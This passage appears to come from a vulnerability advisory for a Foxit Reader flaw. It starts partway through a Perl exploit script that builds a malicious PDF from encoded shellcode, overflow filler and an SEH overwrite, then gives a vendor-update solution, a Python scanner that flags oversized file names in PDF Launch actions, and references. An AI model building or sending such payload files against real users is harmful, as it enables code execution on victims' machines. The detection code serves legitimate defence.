"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
"\x42\x55\x4a\x36\x50\x37\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";

my $overflow1 = "\x41" x 1346;
my $overflow2 = "\x41" x (4096 - (length($shellcode) + 255));
my $overflow3 = "\x41" x 255;
my $sehjmp = "SkD"; # ;)
my $sehret = "\x64\xee\x1f\x02";     # 0x021fee64 - damn you SafeSEH

open(my $pdf, '>', 's.pdf') or die "Cannot open s.pdf: $!";
binmode $pdf;
print $pdf $pdf_data1.
           $overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3.
           $pdf_data2;
close $pdf;




-\\Solution
The vendor has released updates. Please see the references for more information.
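
For triage of stored or inbound PDFs: the 34035.pl listing above ends its first byte string with "/S/Launch/F<</F(/C/" and begins the second with ")>>/NewWindow true>>", so its filler sits inside the file-name string of a Launch action. The Python check below is an added example, not part of the original advisory or of the script; the function names, the 260-byte limit (Windows MAX_PATH) and both sample objects are assumptions constructed for illustration, and it only inspects literal strings in uncompressed objects.

```python
import re

MAX_NAME = 260  # assumption: Windows MAX_PATH used as a sanity limit

LAUNCH = re.compile(rb"/S\s*/Launch\b")   # action dictionary of subtype Launch
F_STRING = re.compile(rb"/F\s*\(")        # /F entry holding a literal string


def read_literal(data, start):
    """Return the bytes of the PDF literal string whose '(' is at `start`.

    Balanced nested parentheses are part of the string and a backslash
    escapes the next byte. Escapes are not decoded (the escaped byte is
    kept as is), which is close enough for measuring length. An
    unterminated string yields everything up to the end of the data.
    """
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i]
        if c == 0x5C:                     # backslash
            out += data[i + 1:i + 2]
            i += 2
            continue
        if c == 0x28:                     # '('
            depth += 1
            if depth > 1:
                out.append(c)
        elif c == 0x29:                   # ')'
            depth -= 1
            if depth == 0:
                return bytes(out)
            out.append(c)
        else:
            out.append(c)
        i += 1
    return bytes(out)


def scan_launch_actions(data, limit=MAX_NAME):
    """List every /F literal string found in objects that hold a Launch action.

    Indirect references (/F 15 0 R) and objects packed in compressed
    object streams are not resolved.
    """
    findings = []
    for m in LAUNCH.finditer(data):
        # Bound the search to the enclosing "N G obj ... endobj" object.
        start = max(data.rfind(b"obj", 0, m.start()), 0)
        end = data.find(b"endobj", m.end())
        end = len(data) if end == -1 else end
        for f in F_STRING.finditer(data, start, end):
            name = read_literal(data, f.end() - 1)
            findings.append({"offset": f.start(),
                             "length": len(name),
                             "oversized": len(name) > limit})
    return findings


# Constructed samples (not taken from a real document).
BENIGN = (b"16 0 obj\r\n<</Type/Action/S/Launch/F<</F(/C/Tools/viewer.exe)>>"
          b"/NewWindow true>>\r\nendobj\r\n")
OVERSIZED = (b"16 0 obj\r\n<</Type/Action/S/Launch/F<</F(/C/" + b"A" * 5000 +
             b")>>/NewWindow true>>\r\nendobj\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        for hit in scan_launch_actions(sample):
            print(label, hit)
```

Any Launch action in an untrusted PDF deserves a look on its own; the length flag separates the pattern used by this listing from ordinary file names.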



-\\Reference(s)
--Foxit Reader Homepage
http://www.foxitsoftware.com/pdf/reader  (Foxit)
--Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability
http://secunia.com/secunia_research/2009-11  (Secunia)
--Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)
http://www.securityfocus.com/archive/1/50162  (Core Security Technologies Advisories)
--Secunia Research: Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability
http://www.securityfocus.com/archive/1/50159  (Secunia Research)
--Bloodhound.PDF.9
http://www.symantec.com/security_response/writeup.jsp?docid=2009-032414-2531-9  (Symantec)
--Building the Most Secure PDF Reader
http://www.foxitsoftware.com/pdf/reader/security.ht  (Foxit)
--CORE-2009-0218 Foxit Reader Multiple Vulnerabilities
http://www.coresecurity.com/content/foxit-reader-vulnerabilitie  (Core Security)